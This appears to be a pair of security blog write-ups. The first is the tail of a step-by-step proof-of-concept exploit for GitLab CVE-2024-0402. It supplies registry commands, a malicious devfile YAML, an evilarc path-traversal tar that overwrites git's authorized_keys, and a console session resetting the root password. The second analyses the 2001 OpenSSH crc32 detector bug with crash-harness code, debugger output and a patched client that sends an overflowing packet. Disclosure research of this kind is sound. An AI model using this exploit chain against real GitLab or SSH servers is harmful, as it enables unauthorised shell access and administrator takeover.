As a result, the destination for the path-traversal tar in our custom registry is:

malicious-registry/stacks/nodejs/2.2.1/archive.tar

Building our custom registry required some extra work: we couldn't make the build scripts work and had to edit them. Eventually, we managed to place our archive.tar (e.g., created using evilarc.py) in the right spot and craft a proper index.json to serve it. The final reusable structure can be found in our PoC repository, so you can save yourself some time building the devfile registry image.

Commands to run the malicious registry:

- docker run -d -p 5000:5000 --name local-registrypoc registry:2 to serve a local container registry that will be used by the devfile registry to store the actual stack (see yellow highlight)
- docker run --network host devfile-index to run the malicious devfile registry built with the official repository. Find it in our PoC repository

Once you have a running registry reachable by the target GitLab instance, you just have to authenticate to GitLab as a developer. Then edit a repository's .devfile.yaml to point to the registry, exploiting the YAML parser differential shown before.

Here is an example you can use:

schemaVersion: 2.2.0
!binary parent:
  id: nodejs
  registryUrl: http://<YOUR_MALICIOUS_REGISTRY>:<PORT>
components:
  - name: development-environment
    attributes:
      gl/inject-editor: true
    container:
      image: "registry.gitlab.com/gitlab-org/gitlab-build-images/workspaces/ubuntu-24.04:20250109224147-golang-1.23@sha256:c3d5527641bc0c6f4fbbea4bb36fe225b8e9f1df69f682c927941327312bc676"

To trigger the file-write, just start a new Workspace in the edited repo and wait.

Nice! We have successfully written Hello CVE-2024-0402! in /tmp/plsWorkItsPartyTime.txt.

We got the write, but we couldn’t stop there, so we investigated some reliable ways to escalate it.

First things first, we checked the system user performing the file write using a session on the GitLab server.

/tmp$ ls -lah /tmp/plsWorkItsPartyTime.txt

-rw-rw-r-- 1 git git 21 Mar 10 15:13 /tmp/plsWorkItsPartyTime.txt

Apparently, our go-to user is git, a pretty important user in the GitLab internals.

After looking for writable files for a quick win, we found that the system seemed hardened, without many editable config files, as expected.

...
/var/opt/gitlab/gitlab-exporter/gitlab-exporter.yml
/var/opt/gitlab/.gitconfig
/var/opt/gitlab/.ssh/authorized_keys
/opt/gitlab/embedded/service/gitlab-rails/db/main_clusterwide.sql
/opt/gitlab/embedded/service/gitlab-rails/db/ci_structure.sql
/var/opt/gitlab/git-data/repositories/.gitaly-metadata
...

Some interesting files were waiting to be overwritten, but you may have noticed the quickest, if not the most honorable, entry: /var/opt/gitlab/.ssh/authorized_keys.

Notably, you can add an SSH key to your GitLab account and then use it to SSH as git to perform code-related operations. The authorized_keys file is managed by GitLab Shell. GitLab Shell adds the SSH keys from user profiles and forces them into a restricted shell that manages and restricts the user's access level.

Here is an example line added to the authorized keys when you add your profile SSH key in GitLab:

command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-ed25519 AAAAC3...[REDACTED]
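That forced command= prefix is what confines profile keys to GitLab Shell, so any line without it grants a regular shell as git. As a defensive sketch, a periodic check could flag such lines. It assumes the Omnibus gitlab-shell path from the example line above and GitLab Shell's own line format (command option first). unrestrictedKeys is a hypothetical helper.

```go
package main

import (
	"bufio"
	"strings"
)

// unrestrictedKeys returns the non-empty, non-comment authorized_keys lines
// that do not start with the expected forced command, i.e. keys that would
// get a regular shell instead of being funnelled into gitlab-shell.
func unrestrictedKeys(contents, forcedCommand string) []string {
	// The trailing space ensures e.g. "gitlab-shell-evil" does not match.
	want := `command="` + forcedCommand + " "
	var out []string
	sc := bufio.NewScanner(strings.NewReader(contents))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		if !strings.HasPrefix(line, want) {
			out = append(out, line)
		}
	}
	return out
}
```

Because OpenSSH accepts options in any order, a non-empty result here is a signal to investigate rather than proof of compromise.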

Since we have an arbitrary file write, we can simply replace authorized_keys with one containing an unrestricted key we control. Back to our exploit prep, create a new ad-hoc .tar for it:

## write a valid entry in a local authorized_keys for one of your keys

➜ python3 evilarc.py authorized_keys -f archive.tar.gz -p var/opt/gitlab/.ssh/ -o unix

At this point, substitute the archive.tar in your malicious devfile registry, rebuild its image and run it. When ready, trigger the exploit again by creating a new Workspace in the GitLab Web UI.

After a few seconds, you should be able to SSH as an unrestricted git user.

Below we also show how to change the GitLab Web root user’s password:

➜ ssh -i ~/.ssh/gitlab2 git@gitinstance.local
➜ git@gitinstance.local:~$ gitlab-rails console --environment production
--------------------------------------------------------------------------------
 Ruby:         ruby 3.1.4p223 (2023-03-30 revision 957bb7cb81) [x86_64-linux]
 GitLab:       16.8.0-ee (1e912d57d5a) EE
 GitLab Shell: 14.32.0
 PostgreSQL:   14.9
------------------------------------------------------------[ booted in 39.28s ]
Loading production environment (Rails 7.0.8)
irb(main):002:0> user = User.find_by_username 'root'
=> #<User id:1 @root>
irb(main):003:0> new_password = 'ItIsPartyTime!'
=> "ItIsPartyTime!"
irb(main):004:0> user.password = new_password
=> "ItIsPartyTime!"
irb(main):005:0> user.password_confirmation = new_password
=> "ItIsPartyTime!"
irb(main):006:0> user.password_automatically_set = false
irb(main):007:0> user.save!
=> true

Finally, you are ready to authenticate as the root user in the target Web instance.

Our goal was to build a PoC for CVE-2024-0402. We were able to do it despite the restricted time and connectivity. Still, there were tons of configuration errors while preparing the GitLab Workspaces environment, we almost surrendered because the feature itself was just not working after hours of setup. Once again, that demonstrates how very good bugs can be found in places where just a few people adventure because of config time constraints.

Shout out to joernchen for discovering the chain. Not only was the bug great, but he also did amazing work describing the research path he followed in this article. We had fun exploiting it, and we hope people will save time with our public exploit!

In case you are just tuning in, Doyensec has found themselves on a cruise ship touring the Mediterranean, unwinding, hanging out with colleagues and having some fun. Part 1 covered our journey into IoT ARM exploitation, while our next blog post, coming in the next couple of weeks, will cover a web target. For this episode, we attempt to exploit one of the most famous vulnerabilities ever: SSHNuke, from back in 2001, better known as the exploit used by Trinity in the movie The Matrix Reloaded.

Back in 1998, Ariel Futoransky and Emiliano Kargieman realized that SSH's protocol was fundamentally flawed, as it was possible to inject ciphertext despite the protocol's CRC32 integrity check. So code to detect this "crc32 compensation attack" was added.

On February 8, 2001, Michal Zalewski posted an advisory to the Bugtraq mailing list named “Remote vulnerability in SSH daemon crc32 compensation attack detector”, labeled CAN-2001-0144 (CAN, aka CVE candidate) (ref). The crc32 compensation attack detector had a unique memory corruption vulnerability that could result in arbitrary code execution.

Shortly after June, TESO Security released a statement regarding the leak of an exploit they wrote. This is interesting, as it suggests that until June there was no reliable public exploit. TESO was aware of six private exploits, including their own.

Keep in mind that the first major OS-level mitigation against memory corruption, ASLR, was not released until July of that year. So the lack of exploits was likely due to the novelty of this vulnerability rather than to exploit mitigations.

The Matrix Reloaded started filming in March 2001 and was released in May 2003. It's impressive that they picked such an amazing bug, from one of the best-known hackers of our day, for the movie.

Building exploit environments is boring at best. At sea, with no Internet, trying to build a 20-year-old piece of software is a nightmare. So while some of our team worked on that, we ported the vulnerability to a standalone main.c that anyone can easily build on any modern (or even old) system.

Feel free to grab it from GitHub, compile it with gcc -g main.c and follow along.

This is your last chance to try and find the bug yourself. The core of the bug is in the following source code.

From: src/deattack.c:82 - 109

```c
/* Detect a crc32 compensation attack on a packet */
int
detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
    static u_int16_t *h = (u_int16_t *) NULL;
    static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE; // DOYEN 0x1000
    register u_int32_t i, j;
    u_int32_t l;
    register unsigned char *c;
    unsigned char *d;

    if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // DOYEN len > 0x40000
        len % SSH_BLOCKSIZE != 0) {              // DOYEN len % 8
        fatal("detect_attack: bad length %d", len);
    }
    for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
        ;

    if (h == NULL) {
        debug("Installing crc compensation attack detector.");
        n = l;
        h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
    } else {
        if (l > n) {
            n = l;
            h = (u_int16_t *) xrealloc(h, n * HASH_ENTRYSIZE);
        }
    }
```

This code makes sure the h buffer and its size n are managed properly. It is crucial, as it runs on every encrypted message. To avoid reallocating on every call, h and n are declared static. On the first call, xmalloc allocates memory for h. Subsequent calls test whether len is too big for n to handle; if so, an xrealloc occurs.

Have you discovered the bug? My first thought was an integer overflow in xmalloc(n * HASH_ENTRYSIZE) or its twin xrealloc(h, n * HASH_ENTRYSIZE). This is wrong! These values cannot overflow because of restrictions on n: it is a 16-bit value, so multiplying it by the small HASH_ENTRYSIZE cannot wrap. Those restrictions, though, end up being the real vulnerability. I am curious whether Zalewski took this path as well.

The variable n is declared as a 16-bit value (static u_int16_t), while l is 32-bit (u_int32_t). So the assignment n = l silently truncates l, a potential integer overflow, whenever l is greater than 0xffff. Can we get l big enough to overflow?

```c
for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
    ;
```

This cryptic line is our only chance to set l. It initially sets l to n. Remember that n holds the current size of h, so l acts as a temporary variable used to check whether n needs adjusting. Every time the for loop runs, l is shifted left by 2 (l << 2), which effectively multiplies l by 4. We know l is initially 0x1000, so after one iteration it is 0x4000, and after another it is 0x10000. Cast to a u_int16_t, 0x10000 wraps around to 0. So all possible values of n are 0x1000, 0x4000 and 0. On any later call, the loop starts from l = n = 0, and shifting 0 always yields 0.

The loop runs while l < HASH_FACTOR(len / SSH_BLOCKSIZE). The HASH_FACTOR macro just multiplies its argument, the number of 8-byte blocks in the buffer, by 3/2. To loop twice, HASH_FACTOR(len / SSH_BLOCKSIZE) must exceed 0x4000, which first happens at len / SSH_BLOCKSIZE = 0x2AAC, so len needs to be 0x15560 or more. We can validate this with our main.c by adding the following code (or by using the cheat branch of the git repo).

```c
int main() {
    size_t len = 0x15560;
    unsigned char *buf = malloc(len);
    memset(buf, 'A', len);
    // call to vulnerable function
    int i = detect_attack(buf, len, NULL);
    free(buf);
    printf("returned %d\n", i);
    return 0;
}
```

Then we debug it on our Mac using lldb.

```
$ gcc -g main.c
$ lldb ./a.out
(lldb) target create "./a.out"
Current executable set to 'a.out' (arm64).
(lldb) source list -n detect_attack
File: main.c
...
   165 int
   166 detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
   167 {
   168 static u_int16_t *h = (u_int16_t *) NULL;
   169 static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
   170 register u_int32_t i, j;
   171 u_int32_t l;
(lldb)
   172 register unsigned char *c;
   173 unsigned char *d;
   174
   175 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
   176 len % SSH_BLOCKSIZE != 0) {
   177 fatal("detect_attack: bad length %d", len);
   178 }
   179 for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180 ;
   181
   182 if (h == NULL) {
(lldb)
(lldb) b 182
Breakpoint 1: where = a.out`detect_attack + 200 at main.c:182:6, address = 0x0000000100003954
(lldb) r
Process 7691 launched: 'a.out' (arm64)
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x0000000100003954 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAA....
   179 for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
   180 ;
   181
-> 182 if (h == NULL) {
   183 debug("Installing crc compensation attack detector.");
   184 n = l;
   185 h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
Target 0: (a.out) stopped.
(lldb) p/x l
(u_int32_t) 0x00010000
(lldb) p/x l & 0xffff
(u_int32_t) 0x00000000
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003970 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAA...
   180 ;
   181
   182 if (h == NULL) {
-> 183 debug("Installing crc compensation attack detector.");
   184 n = l;
   185 h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186 } else {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003974 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAA...
   181
   182 if (h == NULL) {
   183 debug("Installing crc compensation attack detector.");
-> 184 n = l;
   185 h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186 } else {
   187 if (l > n) {
Target 0: (a.out) stopped.
(lldb) n
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = step over
    frame #0: 0x0000000100003980 a.out`detect_attack(buf="AAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
   182 if (h == NULL) {
   183 debug("Installing crc compensation attack detector.");
   184 n = l;
-> 185 h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
   186 } else {
   187 if (l > n) {
   188 n = l;
Target 0: (a.out) stopped.
(lldb) p/x n
(u_int16_t) 0x0000
```

The last line above shows that n is 0 right after n = l. Why this matters quickly becomes apparent if we continue execution.

```
(lldb) c
Process 7691 resuming
Process 7691 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x600082d68282)
    frame #0: 0x0000000100003c78 a.out`detect_attack(buf="AAAAA...
   215 h[HASH(IV) & (n - 1)] = HASH_IV;
   216
   217 for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
-> 218 for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
   219 i = (i + 1) & (n - 1)) {
   220 if (h[i] == HASH_IV) {
   221 if (!CMP(c, IV)) {
Target 0: (a.out) stopped.
(lldb) p/x i
(u_int32_t) 0x41414141
(lldb) p/x h[i]
error: Couldn't apply expression side effects : Couldn't dematerialize a result variable: couldn't read its memory
```

We got a crash, with our injected As showing up in i as 0x41414141.

Just as we pass some nice islands.

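The crash occurs because the check h[0x41414141] != HASH_UNUSED ([0] below) hit invalid memory. With n at 0, the mask n - 1 no longer confines i to the table: n is promoted to int, so n - 1 is -1, which becomes 0xffffffff when combined with the 32-bit hash. The index is therefore the raw hash of our block of As.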

From: src/deattack.c:135 - 153

```c
for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
    for (i = HASH(c) & (n - 1); h[i] /*<- [0]*/ != HASH_UNUSED;
        i = (i + 1) & (n - 1)) {
        if (h[i] == HASH_IV) {
            if (!CMP(c, IV)) {
                if (check_crc(c, buf, len, IV))
                    return (DEATTACK_DETECTED);
                else
                    break;
            }
        } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
            if (check_crc(c, buf, len, IV))
                return (DEATTACK_DETECTED);
            else
                break;
        }
    }
    h[i] = j; // [1] arbitrary write!!!
}
```

What if h[i] pointed to readable memory? After some checks, we would hit [1], where h[i] = j. Notice that j counts the iterations of the loop, one per 8-byte block, so we can control it with our buffer length. The index i is our 0x41414141, which we control with the buffer contents. So we end up with a write-what-where primitive in a loop.

At this point we had a working OpenSSH server nicely set up. Next, we needed to send our buffer over SSH protocol 1. We couldn't find a Python SSH client that worked with such an outdated, broken protocol. Our initial plan was to patch out the OpenSSH crypto code so that talking to the server became a plain socket connection. Instead, we patched the OpenSSH client that came with the source code. It seems the original exploit authors may have taken a similar approach.

Finding the patch location was easy with a little trick. Use gdb to break on the vulnerable detect_attack in the SSH server. Then use gdb to debug the client connecting to the server. The server stops at the breakpoint, so the client hangs waiting for a response to its packet. Hit Ctrl+C in the client's gdb session and we are in the response handler for the first vulnerable packet sent to the server. As a result, we made the following patch.

From: sshconnect1.c:873 - 890

```c
{
    // DOYENSEC
    // Builds a packet to exploit server
    packet_start(SSH_MSG_IGNORE); // Should do nothing
    int dsize = 0x15560 - 0x10; // -0x10 b/c they add crc for us
    char *buf = malloc(dsize);
    memset(buf, 'A', dsize - 1);
    buf[dsize - 1] = '\x00'; // last valid index; buf[dsize] would write past the allocation
    packet_put_string(buf, dsize);
    packet_send();
    packet_write_wait();
}
/* Send the name of the user to log in as on the server. */
packet_start(SSH_CMSG_USER);
packet_put_string(server_user, strlen(server_user));
packet_send();
packet_write_wait();
```

Running this patched client got the same crash as in the case of main.c.

It is important to understand that this exploit primitive has a lot of weaknesses. The h buffer is a u_int16_t *, so every write stores the full 16-bit value of j. On a little-endian system, this means you can't write an arbitrary value to (char *)h + 0 unless you can also set the upper bits of j. To be able to set all the upper bits of j, you need to be able to loop 0x10000 times.

From: src/deattack.c:135

```c
for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
```

The loop consumes 8 (SSH_BLOCKSIZE) bytes for each increment of j, so we would need a 0x80000-byte buffer to do that. The following check caps len at 0x40000, restricting us to only half of all possible j values (0 to 0x7fff).

From: src/deattack.c:93 - 96

```c
if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) || // len > 0x40000
    len % SSH_BLOCKSIZE != 0) {
    fatal("detect_attack: bad length %d", len);
}
```

Further, if you want to write the same value to two locations, you have to call the vulnerable function twice without crashing. But once you cause the static n to be 0, it stays 0 on the next re-entry. This makes the l bit-shifting loop run forever: no matter how many times it shifts, 0 never grows big enough to handle your buffer length. You could bypass this by using your arbitrary write to set n to any value that has a single bit set (i.e. 0x1, 0x2, 0x4…). If you use any other value (e.g. 0x3), the math for the loop may come out differently.

None of this even accounts for the challenges awaiting outside the detect_attack function. If the checksum fails, do you lose your session? What happens if the ciphertext, your buffer, fails to decrypt?

All of this influences which route you take to RCE. Trinity's exploit overwrote the root password with a new arbitrary string. Maybe this was done by pointing the logger at /etc/passwd? Is there an advantage in this over shellcode? What about breaking the authentication flow and just flipping an “is authenticated” bit from false to true? Could you overwrite a client public key in memory to have an RSA exponent of 0? So many fun options to try.

Can you make an exploit that bypasses ASLR?

Our goal was to crash a patched OpenSSH. We exceeded our own expectations given the time and resources available: we crashed an unpatched OpenSSH, with control over the crash. This was thanks to teamwork and creative time-saving shortcuts during the exploitation process. There was a ton of theorycrafting throughout the process that helped us avoid time sinks. Most of all, there was a lot of fun.